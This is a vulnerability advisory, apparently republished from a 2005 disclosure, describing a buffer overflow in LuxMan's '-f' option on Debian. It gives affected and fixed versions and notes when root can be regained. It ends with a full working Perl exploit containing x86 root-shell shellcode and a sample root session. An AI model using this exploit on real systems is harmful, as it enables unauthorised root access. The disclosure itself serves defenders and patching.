Summary
LuxMan is "a Pac-Man clone for SVGALIB. It includes color, sound, several different levels, and difficulty settings".

By providing an overly long argument to LuxMan's '-f' option a fixed buffer will be overflowed and if the program has been set to be setuid you can leverage this to gain elevated privileges.

Credit:
The information has been provided by Kevin Finisterre.
The original article can be found at: http://www.digitalmunition.com/DMA%5B2005-0310a%5D.txt

Details
Vulnerable Systems:
* LuxMan Debian stable 0.41-17.1 and prior
* LuxMan Debian unstable 0.41-19 and prior

Immune Systems:
* LuxMan Debian stable 0.41-17.2
* LuxMan Debian unstable 0.41-20

LuxMan, like all other programs which use "svgalib", runs setuid-root. This means that it can perform any action in your system in using the root user power.

The very first thing the program does (after printing a copyright notice) is to call vga_init(). "vga_init()" is an svgalib routine which initializes the VGA card and gives up root privileges.

LuxMan never attempts to regain root privileges after this point.

The author did a good job at limiting the impact of this bug. By making a call to vga_init() this bug is pretty much curbed. vga_init() detects the chip-set and give up supervisor rights immediately.

If attackers wish to exploit this bug they only have two options... Hope that the machine is running an old school version of sgvalib or to look for 'security compat' in the configuration file. If the attackers have neither of these they are pretty much have to find some other technique for bypassing vga_init().

Svgalib versions prior to 1.2.11 had a security hole where it would be possible to regain root privileges even after a vga_init() call. Some programs may (accidentally) rely on the old vga_init behavior (which was probably due to the author not knowing about saved uids (which might actually even not have existed in Linux at that time)). Because of this svgalib includes the option to revert back to the old behavior. Placing 'security compat' in /etc/vga/libvga.conf or on debian /etc/vga/libvga.config will reinstate the old behavior.

Vendor Status:
The vendor has fixed the problem: http://www.debian.org/security/2005/dsa-693

Exploit:
#!/usr/bin/perl -w
#
# luxman exploit
#
# ii luxman 0.41-19.1 Pac-Man clone (svgalib based)
#
# Tested with "security compat" set in /etc/vga/libvga.config on debian unstable 3.1
#
# kfinisterre@jdam:~$ ./luxman_ex.pl
# LuxMan v0.41, Copyright (c) 1995 Frank McIngvale
# LuxMan comes with ABSOLUTELY NO WARRANTY; see COPYING for details.
#
# You must be the owner of the current console to use svgalib.
# Not running in a graphics capable console,
# and unable to find one.
# Using SIS driver, 2048KB. Chiptype=8
# svgalib 1.4.3
# You must be the owner of the current console to use svgalib.
# Not running in a graphics capable console,
# and unable to find one.
# svgalib: Failed to initialize mouse.
#
# The frame rate is now set to 1 frames per second.
# If the game seems too fast, too slow, or too jerky,
# you can adjust this value the `-r' option.
#
# Calibrating delay...-664257
# Sound server started [pid:7082]
# sh-2.05b# id
# uid=0(root) gid=1000(kfinisterre) groups=1000(kfinisterre)
#

($offset) = @ARGV,$offset || ($offset = 0);

$sc = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";

$ENV{"FOO"} = $sc;

$buf = "A" x 8732;
$buf .= (pack("l",(0xbfffffff-512+$offset)) x2);

#exec("strace -u kfinisterre /usr/games/luxman -r 1 -f $buf");
exec("/usr/games/luxman -r 1 -f $buf");